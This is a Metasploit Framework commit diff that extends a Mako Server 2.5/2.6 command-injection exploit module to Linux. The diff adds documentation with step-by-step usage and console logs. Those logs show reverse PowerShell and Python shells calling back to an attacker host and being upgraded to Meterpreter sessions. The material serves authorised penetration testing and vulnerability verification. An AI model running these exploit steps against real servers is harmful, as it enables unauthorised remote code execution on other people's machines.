Land rapid7#9197, Cleanup Mako Server exploit

acammack-r7 · acammack-r7 · commit c740f4369c52 · 2017-11-15T15:01:31.000-06:00
diff --git a/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md b/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md
@@ -1,6 +1,6 @@
 ## Description
 
-  This module exploits a vulnerability found in Mako Server v2.5.
+  This module exploits a vulnerability found in Mako Server v2.5, 2.6.
   It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp.
 
   Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391
@@ -9,33 +9,48 @@
 
   [Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications.
 
-  This module has been verified against the following Mako Server versions for Windows XP SP3 and Windows 7 SP1 (x86/x64):
+  This module has been verified against the following Mako Server versions for Windows XP SP3, Windows 7 SP1 and Linux Ubuntu 16.04 LTS:
   - v2.5
+  - v2.6
 
   Links:
-  - [Windows installer](https://makoserver.net/download/mako.windows.x86.exe)
+  - [Windows x86 installer](https://makoserver.net/download/mako.windows.x86.exe)
   - [Windows download page](https://makoserver.net/download/windows)
-  - [Documentation](https://makoserver.net/documentation/manual/)
+  - [Linux x64 installer](https://makoserver.net/download/mako.linux-x64.tar.gz)
+  - [Linux download page](https://makoserver.net/download/linux-x86)
+  - [Documentation](https://makoserver.net/download/manual)
 
 ## References for vulnerability
   - https://blogs.securiteam.com/index.php/archives/3391
   - https://www.exploit-db.com/exploits/42683
 
-## Verification Steps
+## Verification Steps for Windows
 
   1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work)
   2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop
-  3. Start msfconsole on host
-  4. Do: ```use exploit/windows/http/makoserver_cmd_exec```
-  5. Do: ```set RHOST <IP address of target system>```
-  6. Do: ```set PAYLOAD cmd/windows/reverse_powershell```
-  7. Do: ```set LHOST <IP address of host system>```
-  8. Do: ```exploit```
-  9. You should get a Windows command shell
+  4. Start msfconsole on host
+  5. Do: ```use exploit/multi/http/makoserver_cmd_exec```
+  6. Do: ```set RHOST <IP address of target system>```
+  7. Do: ```set PAYLOAD cmd/windows/reverse_powershell```
+  8. Do: ```set LHOST <IP address of host system>```
+  9. Do: ```exploit```
+  10. You should get a Windows command shell
+
+## Verification Steps for Linux
+
+  1. Extract the "mako.linux-x64.tar.gz" on a Linux Ubuntu 16.04 LTS (x64) target (with Python for this example to work)
+  2. From inside the extracted folder, do ```./rundemo.sh```
+  4. Start msfconsole on host
+  5. Do: ```use exploit/multi/http/makoserver_cmd_exec```
+  6. Do: ```set RHOST <IP address of target system>```
+  7. Do: ```set PAYLOAD cmd/unix/python_reverse```
+  8. Do: ```set LHOST <IP address of host system>```
+  9. Do: ```exploit```
+  10. You should get a Linux command shell (may need to wait ~30 seconds)
 
 ## Example Output
 ```
-msf > use exploit/windows/http/makoserver_cmd_exec 
+msf > use exploit/multi/http/makoserver_cmd_exec 
 msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
 RHOST => 10.10.10.3
 msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
@@ -57,7 +72,7 @@ C:\Users\Smith\Downloads\MakoServer>
 
 ## Example Verbose Output
 ```
-msf > use exploit/windows/http/makoserver_cmd_exec 
+msf > use exploit/multi/http/makoserver_cmd_exec 
 msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
 RHOST => 10.10.10.3
 msf exploit(makoserver_cmd_exec) > set VERBOSE true
@@ -94,7 +109,7 @@ C:\Users\Smith\Downloads\MakoServer>
   A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session:
 
   ```
-  msf > use exploit/windows/http/makoserver_cmd_exec 
+  msf > use exploit/multi/http/makoserver_cmd_exec 
   msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
   RHOST => 10.10.10.2
   msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
@@ -161,3 +176,76 @@ C:\Users\Smith\Downloads\MakoServer>
   Logged On Users : 2
   Meterpreter     : x86/windows
   ```
+
+### Targeting Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5
+
+  A typical scenario would be to obtain a Linux command shell and then upgrade to a Meterpreter session:
+
+  ```
+  msf > use exploit/multi/http/makoserver_cmd_exec 
+  msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
+  RHOST => 10.10.10.2
+  msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python
+  PAYLOAD => cmd/unix/reverse_python
+  msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
+  LHOST => 10.10.10.4
+  msf exploit(makoserver_cmd_exec) > check
+  [*] 10.10.10.2:80 The target appears to be vulnerable.
+  msf exploit(makoserver_cmd_exec) > exploit
+
+  [*] Started reverse TCP handler on 10.10.10.4:4444 
+  [*] Sending payload to target...
+  [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57888) at 2017-11-10 15:52:33 -0500
+
+  ls
+  LICENSE.txt
+  mako
+  mako.zip
+  README.txt
+  rundemo.sh
+  tutorial
+  ^Z
+  Background session 1? [y/N]  y
+  msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
+  msf post(shell_to_meterpreter) > sessions -l
+
+  Active sessions
+  ===============
+
+    Id  Name  Type            Information  Connection
+    --  ----  ----            -----------  ----------
+    1         shell cmd/unix               10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
+
+  msf post(shell_to_meterpreter) > set SESSION 1
+  SESSION => 1
+  msf post(shell_to_meterpreter) > set LPORT 8080
+  LPORT => 8080
+  msf post(shell_to_meterpreter) > exploit
+
+  [*] Upgrading session ID: 1
+  [*] Starting exploit/multi/handler
+  [*] Started reverse TCP handler on 10.10.10.4:8080 
+  [*] Sending stage (847604 bytes) to 10.10.10.2
+  [*] Meterpreter session 2 opened (10.10.10.4:8080 -> 10.10.10.2:60448) at 2017-11-10 15:54:38 -0500
+  [*] Command stager progress: 100.00% (736/736 bytes)
+  [*] Post module execution completed
+  msf post(shell_to_meterpreter) > sessions -l
+
+  Active sessions
+  ===============
+
+    Id  Name  Type                   Information                                            Connection
+    --  ----  ----                   -----------                                            ----------
+    1         shell cmd/unix                                                                10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
+    2         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ 10.10.10.2  10.10.10.4:8080 -> 10.10.10.2:60448 (10.10.10.2)
+  msf post(shell_to_meterpreter) > sessions -i 2
+  [*] Starting interaction with 2...
+
+  meterpreter > getuid
+  Server username: uid=1000, gid=1000, euid=1000, egid=1000
+  meterpreter > sysinfo
+  Computer     : 10.10.10.2
+  OS           : Ubuntu 16.04 (Linux 4.10.0-35-generic)
+  Architecture : x64
+  Meterpreter  : x86/linux
+  ```
diff --git a/modules/exploits/multi/http/makoserver_cmd_exec.rb b/modules/exploits/multi/http/makoserver_cmd_exec.rb
@@ -4,15 +4,15 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = GoodRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Mako Server v2.5 OS Command Injection RCE',
+      'Name'           => 'Mako Server v2.5, 2.6 OS Command Injection RCE',
       'Description'    => %q{
-        This module exploits a vulnerability found in Mako Server v2.5.
+        This module exploits a vulnerability found in Mako Server v2.5, 2.6.
         It's possible to inject arbitrary OS commands in the Mako Server
         tutorial page through a PUT request to save.lsp.
 
@@ -31,10 +31,10 @@ def initialize(info = {})
           ['URL', 'https://blogs.securiteam.com/index.php/archives/3391']
         ],
       'Arch'           => ARCH_CMD,
-      'Platform'       => 'win',
+      'Platform' => %w[win unix],
       'Targets'        =>
         [
-          ['Mako Server v2.5 - Windows x86/x64', { }]
+          ['Mako Server v2.5, 2.6', {}]
         ],
       'DefaultTarget'  => 0,
       'Privileged'     => false,
